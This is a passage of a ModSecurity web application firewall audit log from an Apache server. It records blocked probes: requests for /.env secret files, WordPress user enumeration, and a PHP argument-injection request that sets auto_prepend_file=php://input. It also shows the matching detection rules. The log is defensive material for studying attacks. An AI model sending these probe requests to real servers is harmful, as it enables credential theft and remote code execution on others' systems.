X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --30404740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30404740-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750012523143520 938 (- - -) Stopwatch2: 1750012523143520 938; combined=356, p1=304, p2=0, p3=0, p4=0, p5=52, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30404740-Z-- --51433674-A-- [16/Jun/2025:02:20:20 +0700] aE8c9D2YoubFl106kA0JTgAAAIs 103.236.140.4 47514 103.236.140.4 8181 --51433674-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Accept-Charset: utf-8 --51433674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51433674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750015220700736 847 (- - -) Stopwatch2: 1750015220700736 847; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51433674-Z-- --b882df56-A-- [16/Jun/2025:02:26:24 +0700] aE8eYLr7GPil_2h-MzZCvQAAAMA 103.236.140.4 50548 103.236.140.4 8181 --b882df56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.57.210.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.57.210.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b882df56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b882df56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750015584123383 2882 (- - -) Stopwatch2: 1750015584123383 2882; combined=1155, p1=460, p2=672, p3=0, p4=0, p5=23, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b882df56-Z-- --f30ef238-A-- [16/Jun/2025:03:40:10 +0700] aE8vqh9AUmrZE8TgO0U4NgAAAEI 103.236.140.4 55062 103.236.140.4 8181 --f30ef238-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 165.98.136.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.98.136.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f30ef238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f30ef238-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750020010742096 3529 (- - -) Stopwatch2: 1750020010742096 3529; combined=1554, p1=580, p2=944, p3=0, p4=0, p5=30, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f30ef238-Z-- --5ef41578-A-- [16/Jun/2025:03:58:36 +0700] aE8z_B9AUmrZE8TgO0U5nwAAAFg 103.236.140.4 57266 103.236.140.4 8181 --5ef41578-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.205.166.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.205.166.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ef41578-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ef41578-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750021116186835 2705 (- - -) Stopwatch2: 1750021116186835 2705; combined=1442, p1=490, p2=923, p3=0, p4=0, p5=29, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ef41578-Z-- --5e1c0f1f-A-- [16/Jun/2025:04:38:15 +0700] aE89R9PYN2mzu-AuhSNhjQAAAA8 103.236.140.4 53008 103.236.140.4 8181 --5e1c0f1f-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 149.102.229.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.102.229.174 X-Forwarded-Proto: http Connection: close --5e1c0f1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e1c0f1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750023495690500 619 (- - -) Stopwatch2: 1750023495690500 619; combined=216, p1=186, p2=0, p3=0, p4=0, p5=30, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e1c0f1f-Z-- --47d6cb09-A-- [16/Jun/2025:05:28:45 +0700] aE9JHdPYN2mzu-AuhSNxegAAAAo 103.236.140.4 53738 103.236.140.4 8181 --47d6cb09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.46.152.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.46.152.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47d6cb09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47d6cb09-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750026525224027 3023 (- - -) Stopwatch2: 1750026525224027 3023; combined=1377, p1=490, p2=833, p3=0, p4=0, p5=53, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47d6cb09-Z-- --2b47c26c-A-- [16/Jun/2025:06:18:20 +0700] aE9UvC-4qihuRDlKQ4lJ7QAAAMA 103.236.140.4 48038 103.236.140.4 8181 --2b47c26c-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Lite Build/PKQ1.181007.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1409 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --2b47c26c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b47c26c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750029500716802 1038 (- - -) Stopwatch2: 1750029500716802 1038; combined=473, p1=438, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b47c26c-Z-- --5db5792c-A-- [16/Jun/2025:06:29:58 +0700] aE9Xdh9AUmrZE8TgO0VWdgAAAFQ 103.236.140.4 60370 103.236.140.4 8181 --5db5792c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.142.104.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.142.104.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5db5792c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5db5792c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750030198891669 2951 (- - -) Stopwatch2: 1750030198891669 2951; combined=1307, p1=468, p2=809, p3=0, p4=0, p5=29, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5db5792c-Z-- --9ef13b5b-A-- [16/Jun/2025:07:27:11 +0700] aE9k39PYN2mzu-AuhSOJdwAAABc 103.236.140.4 58580 103.236.140.4 8181 --9ef13b5b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.5.36.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.5.36.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ef13b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ef13b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750033631655100 3022 (- - -) Stopwatch2: 1750033631655100 3022; combined=1299, p1=430, p2=837, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ef13b5b-Z-- --2d6c0664-A-- [16/Jun/2025:09:16:20 +0700] aE9-dB9AUmrZE8TgO0WBEgAAAFQ 103.236.140.4 43554 103.236.140.4 8181 --2d6c0664-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 Accept-Charset: utf-8 --2d6c0664-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d6c0664-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750040180054214 833 (- - -) Stopwatch2: 1750040180054214 833; combined=396, p1=354, p2=0, p3=0, p4=0, p5=42, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d6c0664-Z-- --69985505-A-- [16/Jun/2025:09:23:21 +0700] aE-AGdPYN2mzu-AuhSOoHAAAABE 103.236.140.4 49842 103.236.140.4 8181 --69985505-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.4 Safari/537.36 Accept-Charset: utf-8 --69985505-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69985505-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750040601231280 914 (- - -) Stopwatch2: 1750040601231280 914; combined=398, p1=338, p2=0, p3=0, p4=0, p5=60, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69985505-Z-- --7621f07c-A-- [16/Jun/2025:09:31:04 +0700] aE-B6Gf-_Obc6SnO-jx3wQAAAJc 103.236.140.4 52752 103.236.140.4 8181 --7621f07c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --7621f07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7621f07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750041064439404 864 (- - -) Stopwatch2: 1750041064439404 864; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7621f07c-Z-- --599e0e0e-A-- [16/Jun/2025:09:41:08 +0700] aE-ERC-4qihuRDlKQ4l4uQAAAMk 103.236.140.4 52812 103.236.140.4 8181 --599e0e0e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.135.45.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.135.45.32 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --599e0e0e-C-- --599e0e0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --599e0e0e-E-- --599e0e0e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750041668035756 4845 (- - -) Stopwatch2: 1750041668035756 4845; combined=3153, p1=510, p2=2603, p3=0, p4=0, p5=40, sr=86, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --599e0e0e-Z-- --dca9f025-A-- [16/Jun/2025:10:01:54 +0700] aE-JItPYN2mzu-AuhSOpDAAAABE 103.236.140.4 53016 103.236.140.4 8181 --dca9f025-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept-Charset: utf-8 --dca9f025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dca9f025-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750042914527189 886 (- - -) Stopwatch2: 1750042914527189 886; combined=350, p1=303, p2=0, p3=0, p4=0, p5=47, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dca9f025-Z-- --332e876f-A-- [16/Jun/2025:10:02:09 +0700] aE-JMdPYN2mzu-AuhSOpDQAAAAI 103.236.140.4 53018 103.236.140.4 8181 --332e876f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Accept-Charset: utf-8 --332e876f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --332e876f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750042929469093 806 (- - -) Stopwatch2: 1750042929469093 806; combined=342, p1=304, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --332e876f-Z-- --b3aba43e-A-- [16/Jun/2025:10:11:51 +0700] aE-Ld2f-_Obc6SnO-jx3zAAAAIc 103.236.140.4 53048 103.236.140.4 8181 --b3aba43e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b3aba43e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3aba43e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043511225146 881 (- - -) Stopwatch2: 1750043511225146 881; combined=357, p1=318, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3aba43e-Z-- --05148b11-A-- [16/Jun/2025:10:11:51 +0700] aE-Ld9PYN2mzu-AuhSOpFQAAAAA 103.236.140.4 53050 103.236.140.4 8181 --05148b11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE) accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --05148b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05148b11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750043511462611 719 (- - -) Stopwatch2: 1750043511462611 719; combined=291, p1=254, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05148b11-Z-- --62035f44-A-- [16/Jun/2025:10:11:51 +0700] aE-Ld9PYN2mzu-AuhSOpFgAAAAM 103.236.140.4 53052 103.236.140.4 8181 --62035f44-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 158.101.11.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 158.101.11.142 